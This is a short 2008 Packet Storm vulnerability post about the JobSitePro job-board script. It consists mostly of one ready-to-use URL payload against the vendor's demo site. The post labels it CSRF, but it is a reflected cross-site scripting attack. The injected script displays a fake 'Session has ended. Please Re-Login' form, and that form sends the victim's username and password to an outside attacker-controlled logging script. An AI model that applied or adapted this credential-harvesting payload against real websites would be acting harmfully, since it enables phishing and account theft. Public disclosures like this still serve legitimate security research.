jobsitepro-xsrf.txt

2008-09-03T00:00:00
ID PACKETSTORM:69549
Type packetstorm
Reporter e.wiZz!
Modified 2008-09-03T00:00:00

Description

                                        
                                            `####################JobSitePro CSRF Vulnerability####################  
  
  
######By: e.wiZz!  
######Info: Bosnian Idiot FTW!  
######Blog: infected.blogger.ba  
  
  
In the wild...  
  
#######################################################  
#####Site: http://phplabs.com/demo/jobsitepro/  
  
  
  
#####CSRF on demo site:  
  
http://phplabs.com/demo/jobsitepro/user.php?act=login&message=%3Cscript%20language=%22javascript%22%3Edocument.getElementById('divfalso').style.visibility%20=%20%22visible%22;%20%3C/script%3E%3Cdiv%20id='divfalso'%20style='position:absolute;z-index:1;width:100%;height:100%;top:0;left:0;border:%202px%20solid%20black;background-color:%20white;visibility:false;'%3ESession%20has%20ended.%20Please%20Re-Login%3Cform%20method='post'%20action='http://www.hax0rz.com/log.php'%3EUser:%3Cinput%20type='text'%20name='login'%3E%3Cbr%3EPass:%3Cinput%20type='password'%20name='pass'%3E%3Cbr%3E%3Cinput%20type='submit'%3E%3C/form%3E%3C/div%3E`